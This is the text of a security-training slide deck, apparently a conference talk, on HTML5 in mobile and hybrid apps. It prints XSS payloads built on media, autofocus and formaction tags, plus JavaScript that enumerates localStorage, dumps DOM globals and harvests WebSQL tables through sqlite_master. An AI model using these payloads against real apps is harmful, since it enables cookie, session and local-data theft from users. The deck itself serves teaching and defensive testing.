html5 on mobile
TRANSCRIPT
© Blueinfy Solutions
HTML5 and Mobile
© Blueinfy Solutions
What is HTML5
• Enhancement to HTML 4.01 – with more tags – API Support– Functionality to support mobile devices– More types for existing tags
• Does not mean old tags will not work• Existing application can be converted by
changing “<!DOCTYPE html>” in first line
© Blueinfy Solutions
HTML5 in Mobile
• It is changing the game• Apps are migrating to HTML5 and no need to
use native• Web vs. Mobile
– Both can use HTML5– No need to manage several code base– HTML+CSS+JS only– Server side services
© Blueinfy Solutions
Technology Vectors
© Blueinfy Solutions
What is running - where???
Presentation Layer
Business Layer
Data Access LayerAuthentication
Communication etc.
Runtime, Platform, Operating System Components
Server sideComponents
Client sideComponents(Browser)
• HTML 5
• DOM
• XHR
• WebSocket
• Storage• WebSQL
• Flash
• Flex
• AMF
• Silverlight • WCF
• XAML
• NET
• Storage
• JS
• Android
• iPhone/Pad
• Other Mobile
© Blueinfy Solutions
HTML5 in nutshell - Specs
6
Source: http://en.wikipedia.org/wiki/File:HTML5-APIs-and-related-technologies-by-Sergey-Mavrody.png
Source: http://html5demos.com/
Evolution going on by Web Hypertext Application Technology Working Group (WHATWG)
© Blueinfy Solutions
Key HTML5 features for Mobile
• Offline web application support• Web Storage• GeoLocation API• Canvas 2D Drawing• Video and Audio streaming support
7
© Blueinfy Solutions
HTML5 features not supported on Mobile
• Microdata• 3D animation• FileReader API• IndexDB• WebWorkers
8
© Blueinfy Solutions
API (Media, Geo etc.) & Messaging Plug-In
Modern Browser Model
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS/Content-Sec Sandbox
Presentation
Process & Logic
Network & Access
Core Policies
StorageWebSQL
Mobile
CacheFileSystem
© Blueinfy Solutions
Abusing HTML 5 Tags
• Various new tags and can be abused, may not be filtered or validated
• Media tags<video poster=javascript:alert(document.cookie)//<audio><source onerror="javascript:alert(document.cookie)">
• Form tags<form><button formaction="javascript:alert(document.cookie)">foo<body oninput=alert(document.cookie)><input autofocus>
10
© Blueinfy Solutions
Accessing media tags
© Blueinfy Solutions
Moving/Touch
© Blueinfy Solutions
Login cookie
© Blueinfy Solutions
Profile
• Fetch through storage – cookie not needed…
© Blueinfy Solutions
WebSQL data
• Through JavaScript one can store information on database.
• Example
15
© Blueinfy Solutions
One time fetch
© Blueinfy Solutions
Network calls
• HTML 5 provides WebSocket and XHR Level 2 calls
• It allows to make cross domains call and raw socket capabilities
• It can be leveraged by JavaScript payload• Malware or worm can use it to perform
several scanning tasks
17
© Blueinfy Solutions
Same Origin Policy (SOP)
• Browser’s sandbox– Protocol, Host and Port should match– It is possible to set document.domain to parent
domain if current context is child domain– Top level domain (TLD) locking down helps in
sandboxing the context
18
© Blueinfy Solutions
Fetching Location
© Blueinfy Solutions
Location calls
© Blueinfy Solutions
Hybrid App
• Android
© Blueinfy Solutions
Integrating native to webview
• Hook your handlers to make it hybrid• Interact with webview
© Blueinfy Solutions
Set permissions
• Manifest file
© Blueinfy Solutions
Loading Hybrid App
© Blueinfy Solutions
Slidebar type touch views
© Blueinfy Solutions
HTML5 Attacks
© Blueinfy Solutions
API (Media, Geo etc.) & Messaging Plug-In
XSS with HTML5 (tags, attributes and events)
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network & Access
Core Policies
StorageWebSQL
Mobile
Cache
© Blueinfy Solutions
HTML5 – Tags/Attributes/Events
• Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)
• Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
• Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc.
28
© Blueinfy Solutions
XSS variants
• Media tags• Examples
– <video><source onerror="javascript:alert(1)“>– <video onerror="javascript:alert(1)"><source>
29
© Blueinfy Solutions
XSS variants• Exploiting autofocus
– <input autofocus onfocus=alert(1)> – <select autofocus onfocus=alert(1)> – <textarea autofocus onfocus=alert(1)> – <keygen autofocus onfocus=alert(1)>
30
© Blueinfy Solutions
XSS variants
• Form & Button etc.– <form id="test" /><button form="test"
formaction="javascript:alert(1)">test– <form><button
formaction="javascript:alert(1)">test
• Etc … and more …– Nice HTML5 XSS cheat sheet
(http://html5sec.org/) 31
© Blueinfy Solutions
• Once have an entry point – game over!
Extraction through XSS
© Blueinfy Solutions
API (Media, Geo etc.) & Messaging Plug-In
Web Storage and DOM information extraction
HTML5 + CSS Silverlight Flash
Browser Native Network Services
XHR 1 & 2 WebSocket Plug-in Sockets
JavaScript DOM/Events Parser/Threads
SOP/CORS Sandbox
Presentation
Process & Logic
Network & Access
Core Policies
StorageWebSQL
Mobile
Cache
© Blueinfy Solutions
Web Storage Extraction
• Browser has one place to store data – Cookie (limited and replayed)
• HTML5 – Storage API provided (Local and Session)
• Can hold global scoped variables• http://www.w3.org/TR/webstorage/
34
© Blueinfy Solutions
Web Storage Extraction• It is possible to steal them through XSS or via
JavaScript• Session hijacking – HttpOnly of no use• getItem and setItem calls
• XSS the box and scan through storage
© Blueinfy Solutions
Blind storage enumerationif(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); }}
• Above code allows all storage variable extraction
36
© Blueinfy Solutions
• HTML5 provides virtual file system with filesystem APIs– window.requestFileSystem =
window.requestFileSystem || window.webkitRequestFileSystem;
• It becomes a full blown local system for application in sandbox
• It empowers application
File System Storage
© Blueinfy Solutions
• It provides temporary or permanent file systemfunction init() {
window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) {
filesys = filesystem; }, catcherror);}
• App can have full filesystem in place now.
File System Storage
© Blueinfy Solutions
• Assuming app is creating profile on local system
Sensitive information filesystem
© Blueinfy Solutions
DOM Storage• Applications run with “rich” DOM• JavaScript sets several variables and
parameters while loading – GLOBALS• It has sensitive information and what if they
are GLOBAL and remains during the life of application
• It can be retrieved with XSS• HTTP request and response are going through
JavaScripts (XHR) – what about those vars?
© Blueinfy Solutions
Blind Enumerationfor(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} }
41
© Blueinfy Solutions
Global Sensitive Information Extraction from DOM
• HTML5 apps running on Single DOM• Having several key global variables, objects
and array– var arrayGlobals =
['[email protected]',"12141hewvsdr9321343423mjfdvint","test.com"];
• Post DOM based exploitation possible and harvesting all these values.
42
© Blueinfy Solutions
Global Sensitive Information Extraction from DOM
for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} }}
43
© Blueinfy Solutions
SQL Injection
• WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.
• Allows one time data loading and offline browsing capabilities.
• Causes security concern and potential injection points.
• Methods and calls are possible
© Blueinfy Solutions
SQL Injection
• Through JavaScript one can harvest entire local database.
• Example
© Blueinfy Solutions
Blind WebSQL Enumeration
• We need following to exploit– Database object– Table structure created on SQLite– User table on which we need to run select query
46
© Blueinfy Solutions
Blind WebSQL Enumerationvar dbo;var table;var usertable;for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type=\'table\'',
[],function(tx,results){
table=results; },null); }); } }catch(ex){}}if(table.rows.length>1) usertable=table.rows.item(1).name;
47
© Blueinfy Solutions
Blind WebSQL Enumeration
• We will run through all objects and get object where constructor is “Database”
• We will make Select query directly to sqlite_master database
• We will grab 1st table leaving webkit table on 0th entry
48
© Blueinfy Solutions
Blind WebSQL Enumeration
49
© Blueinfy Solutions
Conclusion